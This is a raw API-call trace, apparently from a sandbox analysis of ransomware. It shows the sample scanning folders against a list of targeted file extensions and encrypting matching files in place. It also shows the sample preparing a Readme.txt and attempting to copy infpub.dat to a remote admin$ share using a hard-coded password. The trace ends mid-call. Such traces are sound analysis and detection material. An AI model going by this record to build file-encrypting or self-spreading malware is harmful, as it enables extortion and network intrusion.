(lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".dll.") returned 0x0 [0030.575] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.575] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.575] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="pss10r.chm" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" [0030.575] PathFindExtensionW (pszPath="pss10r.chm") returned=".chm" [0030.575] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".chm.") returned 0x0 [0030.575] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.575] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.575] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="setup.chm" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm" [0030.576] PathFindExtensionW (pszPath="setup.chm") returned=".chm" [0030.576] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".chm.") returned 0x0 [0030.576] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.576] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.576] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="Setup.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" [0030.576] PathFindExtensionW (pszPath="Setup.xml") returned=".xml" [0030.576] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0030.576] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31ce05c | out: phKey=0x31ce05c*=0x3683b0) returned 1 [0030.576] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x22c [0030.576] GetFileSizeEx (in: hFile=0x22c, lpFileSize=0x31ce040 | out: lpFileSize=0x31ce040*=9352) returned 1 [0030.576] CreateFileMappingW (hFile=0x22c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x24b2, lpName=0x0) returned 0x230 [0030.576] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.576] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2488) returned 0xa0000 [0030.588] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.588] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x2488) returned 0xa0000 [0030.589] CryptEncrypt (in: hKey=0x3683b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31ce070*=0x2488, dwBufLen=0x2490 | out: pbData=0xa0000*, pdwDataLen=0x31ce070*=0x2490) returned 1 [0030.589] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x2490) returned 1 [0030.593] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.593] GetSystemInfo (in: lpSystemInfo=0x31cdfe4 | out: lpSystemInfo=0x31cdfe4*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.593] MapViewOfFile (hFileMappingObject=0x230, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x24b2) returned 0xa0000 [0030.594] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31ce020 | out: phHash=0x31ce020) returned 1 [0030.594] CryptHashData (hHash=0x368430, pbData=0xa248c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0030.594] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0030.594] CryptGetHashParam (in: hHash=0x368430, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31ce010, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31ce010) returned 1 [0030.594] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x24b2) returned 1 [0030.595] LocalFree (hMem=0x36ea40) returned 0x0 [0030.595] CryptDestroyHash (hHash=0x368430) returned 1 [0030.595] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.595] CloseHandle (hObject=0x230) returned 1 [0030.595] CloseHandle (hObject=0x22c) returned 1 [0030.595] CryptDestroyKey (hKey=0x3683b0) returned 1 [0030.595] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.595] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.595] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", pszFile="ShellUI.MST" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST") returned="C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\ShellUI.MST" [0030.595] PathFindExtensionW (pszPath="ShellUI.MST") returned=".MST" [0030.595] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".MST.") returned 0x0 [0030.595] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0 [0030.595] FindClose (in: hFindFile=0x368370 | out: hFindFile=0x368370) returned 1 [0030.596] FindNextFileW (in: hFindFile=0x368330, lpFindFileData=0x31ce710 | out: lpFindFileData=0x31ce710) returned 1 [0030.596] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.596] PathCombineW (in: pszDest=0x31ce960, pszDir="C:\\MSOCache\\All Users", pszFile="{90140000-0117-0409-1000-0000000FF1CE}-C" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C" [0030.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="\\Windows") returned 0x0 [0030.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="\\Program Files") returned 0x0 [0030.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="\\ProgramData") returned 0x0 [0030.596] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", lpSrch="\\AppData") returned 0x0 [0030.596] PathCombineW (in: pszDest=0x31ce4e0, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*" [0030.596] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 0x368370 [0030.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.603] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.603] FindNextFileW (in: hFindFile=0x368370, lpFindFileData=0x31ce088 | out: lpFindFileData=0x31ce088) returned 1 [0030.603] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.603] PathCombineW (in: pszDest=0x31ce2d8, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C", pszFile="Access.en-us" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us" [0030.603] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpSrch="\\Windows") returned 0x0 [0030.603] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpSrch="\\Program Files") returned 0x0 [0030.603] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpSrch="\\ProgramData") returned 0x0 [0030.603] StrStrIW (lpFirst="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", lpSrch="\\AppData") returned 0x0 [0030.603] PathCombineW (in: pszDest=0x31cde58, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", pszFile="*" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*" [0030.603] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\*", lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 0x3683b0 [0030.659] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.659] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0030.659] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.659] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0030.659] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.659] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", pszFile="AccessMUI.msi" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.msi" [0030.659] PathFindExtensionW (pszPath="AccessMUI.msi") returned=".msi" [0030.659] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".msi.") returned 0x0 [0030.659] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0030.659] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.659] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", pszFile="AccessMUI.xml" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" [0030.659] PathFindExtensionW (pszPath="AccessMUI.xml") returned=".xml" [0030.659] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".xml.") returned=".xml.xvd.zip." [0030.659] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0030.659] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccessMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\accessmui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0030.698] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=1349) returned 1 [0030.698] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x572, lpName=0x0) returned 0x280 [0030.698] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.698] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x545) returned 0xa0000 [0030.705] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.705] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x545) returned 0xa0000 [0030.706] CryptEncrypt (in: hKey=0x368430, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x545, dwBufLen=0x550 | out: pbData=0xa0000*, pdwDataLen=0x31cd9e8*=0x550) returned 1 [0030.706] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x550) returned 1 [0030.717] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.717] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.717] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x572) returned 0xa0000 [0030.718] CryptDuplicateHash (in: hHash=0x368270, pdwReserved=0x0, dwFlags=0x0, phHash=0x31cd998 | out: phHash=0x31cd998) returned 1 [0030.718] CryptHashData (hHash=0x368470, pbData=0xa054c, dwDataLen=0x4, dwFlags=0x0) returned 1 [0030.718] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x36ea40 [0030.718] CryptGetHashParam (in: hHash=0x368470, dwParam=0x2, pbData=0x36ea40, pdwDataLen=0x31cd988, dwFlags=0x0 | out: pbData=0x36ea40, pdwDataLen=0x31cd988) returned 1 [0030.718] FlushViewOfFile (lpBaseAddress=0xa0000, dwNumberOfBytesToFlush=0x572) returned 1 [0030.719] LocalFree (hMem=0x36ea40) returned 0x0 [0030.719] CryptDestroyHash (hHash=0x368470) returned 1 [0030.719] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.719] CloseHandle (hObject=0x280) returned 1 [0030.719] CloseHandle (hObject=0x230) returned 1 [0030.719] CryptDestroyKey (hKey=0x368430) returned 1 [0030.719] FindNextFileW (in: hFindFile=0x3683b0, lpFindFileData=0x31cda00 | out: lpFindFileData=0x31cda00) returned 1 [0030.719] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0x0) returned 0x102 [0030.719] PathCombineW (in: pszDest=0x31cdc50, pszDir="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us", pszFile="AccLR.cab" | out: pszDest="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab") returned="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" [0030.719] PathFindExtensionW (pszPath="AccLR.cab") returned=".cab" [0030.719] StrStrIW (lpFirst=".3ds.7z.accdb.ai.asm.asp.aspx.avhd.back.bak.bmp.brw.c.cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip.", lpSrch=".cab.") returned=".cab.cc.cer.cfg.conf.cpp.crt.cs.ctl.cxx.dbf.der.dib.disk.djvu.doc.docx.dwg.eml.fdb.gz.h.hdd.hpp.hxx.iso.java.jfif.jpe.jpeg.jpg.js.kdbx.key.mail.mdb.msg.nrg.odc.odf.odg.odi.odm.odp.ods.odt.ora.ost.ova.ovf.p12.p7b.p7c.pdf.pem.pfx.php.pmf.png.ppt.pptx.ps1.pst.pvi.py.pyc.pyw.qcow.qcow2.rar.rb.rtf.scm.sln.sql.tar.tib.tif.tiff.vb.vbox.vbs.vcb.vdi.vfd.vhd.vhdx.vmc.vmdk.vmsd.vmtm.vmx.vsdx.vsv.work.xls.xlsx.xml.xvd.zip." [0030.719] CryptDuplicateKey (in: hKey=0x37f480, pdwReserved=0x0, dwFlags=0x0, phKey=0x31cd9d4 | out: phKey=0x31cd9d4*=0x368430) returned 1 [0030.720] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-0117-0409-1000-0000000FF1CE}-C\\Access.en-us\\AccLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-0117-0409-1000-0000000ff1ce}-c\\access.en-us\\acclr.cab"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x230 [0030.721] GetFileSizeEx (in: hFile=0x230, lpFileSize=0x31cd9b8 | out: lpFileSize=0x31cd9b8*=28016276) returned 1 [0030.721] CreateFileMappingW (hFile=0x230, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x1ab7eb6, lpName=0x0) returned 0x280 [0030.721] GetSystemInfo (in: lpSystemInfo=0x31cd95c | out: lpSystemInfo=0x31cd95c*(dwOemId=0x0, wProcessorArchitecture=0x0, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffeffff, dwActiveProcessorMask=0x3, dwNumberOfProcessors=0x2, dwProcessorType=0x24a, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5e03)) [0030.721] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x4, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x1ab0000, dwNumberOfBytesToMap=0x7e94) returned 0xa0000 [0030.733] UnmapViewOfFile (lpBaseAddress=0xa0000) returned 1 [0030.733] MapViewOfFile (hFileMappingObject=0x280, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x1000000) returned 0x3240000 [0030.734] CryptEncrypt (hKey=0x368430, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x3240000*, pdwDataLen=0x31cd9e8*=0x1000000, dwBufLen=0x1ab7e94) Thread: id = 36 os_tid = 0xa14 [0019.664] wsprintfW (in: param_1=0x318f5e4, param_2="%s" | out: param_1="Readme.txt") returned 10 [0019.664] PathCombineW (in: pszDest=0x318efcc, pszDir="C:\\", pszFile="Readme.txt" | out: pszDest="C:\\Readme.txt") returned="C:\\Readme.txt" [0019.664] GetTickCount () returned 0x14807 [0019.664] WaitForMultipleObjects (nCount=0x2, lpHandles=0x31b4e0*=0x210, bWaitAll=0, dwMilliseconds=0xcd140) Thread: id = 37 os_tid = 0xa18 [0019.697] wsprintfW (in: param_1=0x426e220, param_2="\\\\%s\\admin$" | out: param_1="\\\\192.168.0.1\\admin$") returned 20 [0019.697] PathFindFileNameW (pszPath="C:\\Windows\\infpub.dat") returned="infpub.dat" [0019.697] wsprintfW (in: param_1=0x426ee30, param_2="\\\\%ws\\admin$\\%ws" | out: param_1="\\\\192.168.0.1\\admin$\\infpub.dat") returned 31 [0019.697] wsprintfW (in: param_1=0x426f630, param_2="\\\\%ws\\admin$\\%ws" | out: param_1="\\\\192.168.0.1\\admin$\\infpub.dat") returned 31 [0019.697] PathFindExtensionW (pszPath="\\\\192.168.0.1\\admin$\\infpub.dat") returned=".dat" [0019.697] wsprintfW (in: param_1=0x426e630, param_2="\\\\%ws\\admin$\\%ws" | out: param_1="\\\\192.168.0.1\\admin$\\cscc.dat") returned 29 [0019.698] WNetAddConnection2W (lpNetResource=0x426e1a4*(dwScope=0x0, dwType=0x1, dwDisplayType=0x0, dwUsage=0x0, lpLocalName=0x0, lpRemoteName="\\\\192.168.0.1\\admin$", lpComment=0x0, lpProvider=0x0), lpPassword="6mnH7CdKK", 